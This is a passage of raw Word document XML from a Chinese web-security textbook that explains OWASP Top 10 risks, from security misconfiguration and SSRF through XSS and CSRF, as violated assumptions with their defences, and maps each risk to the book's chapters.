        <w:t xml:space="preserve">本卷对应章：加密传输基础已在馆藏《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（TLS）中讲授，本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节仅补充安全相关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头（HSTS、CSP、SameSite）的概念。会话令牌的安全存储、JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的签名校验等具体实践在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章展开。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">四、安全配置错误（Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Misconfiguration）——假设“默认配置对安全足够”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是一个覆盖面极广的风险类别。假设被违反的场景包括：云存储桶的公开访问权限、目录列表功能未关闭、错误消息暴露堆栈跟踪与框架版本、不必要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT、DELETE）被启用、以及默认管理员凭据未修改。其根源通常不在“漏洞代码”，而在于部署与运维阶段的安全加固缺失。OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提出“纵深防御配置硬化”作为核心缓解策略：定期对操作系统、Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器、数据库、应用框架执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CIS Benchmarks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风格的安全基线检查。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本卷对应章：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章讨论文件上传目录的执行权限问题（上传目录不应可执行脚本），第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章在安全开发生命周期（SDL）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部分回到配置管理的思路。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">五、服务端请求伪造（SSRF）——假设“服务器只能访问它该访问的外部资源”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF（Server-Side</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Forgery，服务端请求伪造）的直觉是：攻击者让服务器代替自己发出请求。这一攻击之所以危险，是因为服务器的网络位置往往拥有更高的信任度——它可以访问内网服务、云实例元数据端点（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AWS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">169.254.169.254</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）或内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API。当应用从用户提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取资源而未做出站白名单校验时，这一假设即告崩溃。SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已成为云原生环境中最为致命的攻击向量之一。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本卷对应章：SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的原理与检测防御在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一并详述。SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与注入的“同源”——数据被不可信地插入请求目标之中——在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的注入纵深防御收口框中也将再被提及。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">六、软件与数据完整性故障（Software</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and Data Integrity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Failures）——假设“运行的代码与加载的数据来自可信源且未被篡改”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一类风险在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的新版分类中被独立强调，涵盖不安全的反序列化（Insecure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Deserialization）、依赖库未校验完整性（如使用含已知漏洞的第三方组件，或通过不安全的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CDN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加载脚本）、CI/CD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">管道中的未授权代码提交、以及固件或更新包的签名校验缺失。其核心假设失效在于：软件信任链的某一环被打破，攻击者得以向应用注入恶意逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不安全反序列化的原理直觉是：当应用将不可信的数据流还原为内存中的对象，攻击者可以通过精心构造的序列化数据触发应用逻辑中的危险操作（gadget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">chain），最终导致远程代码执行。这一攻击高度依赖语言与库的具体实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本卷对应章：不安全反序列化与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI（Server-Side</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Template </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection）的概念与防御在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节集中讲授。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">七、认证与身份识别失败（Identification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and Authentication </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Failures）——假设“只有合法用户能通过身份验证”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这里强调的不是访问控制（你有权做什么），而是身份主张的验证（你究竟是谁）。被违反的假设包括：弱口令策略允许暴力破解、会话标识符（Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID）可预测或暴露在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中、凭证通过未加密信道传输、未实施多因素认证（MFA）、以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT（JSON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token）的签名算法被篡改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。Stuttard–Pinto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》中以大量篇幅分析了现实世界中会话管理机制的常见失误，指出“无法验证的身份主张等同于没有任何身份”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本卷对应章：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节详述弱口令爆破（Hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在线爆破机理）、会话固定（Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Fixation）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击的概念。速率限制与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MFA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在防御对照框中一致给出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">八、安全日志与监控失败（Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Logging and Monitoring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Failures）——假设“攻击行为会被及时发现与追溯”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">没有足够的日志与监控，攻击者可以在系统中长期驻留而不被察觉。这一风险的特点在于：它不直接导致漏洞的产生，但会成倍放大所有其他风险的损害程度。OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">建议日志中必须包含时间戳、用户标识、操作类型与结果，且日志本身需要防篡改。MITRE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架将防御者的日志分析能力映射到几乎每一个攻击技术（Technique）的检测手段上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本卷对应章：虽然没有独立的一章只讲日志，但防御对照框在全卷贯穿此原则——第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章防御框要求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION/报错查询；第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章要求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报告收集</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尝试；第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章要求异常文件访问监控；第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SDL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">收口中将安全监控作为纵深防御的最后一道关口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">九、跨站脚本（XSS）——假设“浏览器能区分来自应用的代码与来自攻击者的数据”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS（Cross-Site</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Scripting，跨站脚本）是客户端攻防的核心。攻击者通过向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面注入恶意脚本，使之在受害者浏览器中执行，从而窃取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie、劫持会话、篡改页面内容或发起进一步的攻击。三型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS——存储型（Stored）、反射型（Reflected）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">型（DOM-based）——的区别在于恶意脚本的注入与触发位置不同，但本质违反的是同一个假设：应用未对用户输入执行输出编码，使数据在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML、JavaScript、CSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上下文中被解释为可执行代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直觉上，这是注入在客户端的具体映射：服务器或浏览器将攻击者的输入误认为是开发者预期内的脚本。防御的核心是上下文敏感的输出编码与强大的内容安全策略（CSP）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本卷对应章：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节深入分析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的三型机理，并在防御对照框中给出输出编码、CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HttpOnly Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的完整对策。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">十、跨站请求伪造（CSRF）——假设“浏览器发出的请求确实来自用户的真实意愿”被违反</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF（Cross-Site</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Forgery，跨站请求伪造）利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用的隐式信任——浏览器会自动附带目标站点的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie。攻击者在第三方页面中构造一个指向目标应用的请求（例如表单提交、图片</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">src</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、AJAX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调用），当已认证的受害者访问该页面时，浏览器便在用户不知情的情况下发出该恶意请求。被违反的假设是：每一个到达服务端的请求，都必然是用户看到页面后有意识地点击或提交所致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御的核心在于引入一个攻击者无法伪造的秘密：Anti-CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token。SameSite Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性为该问题提供了另一重浏览器原生防护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本卷对应章：CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的原理、防御与靶机实操在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节详细展开。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述十类风险的卷内章节映射汇总如下：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OWASP Top 10 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">风险类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
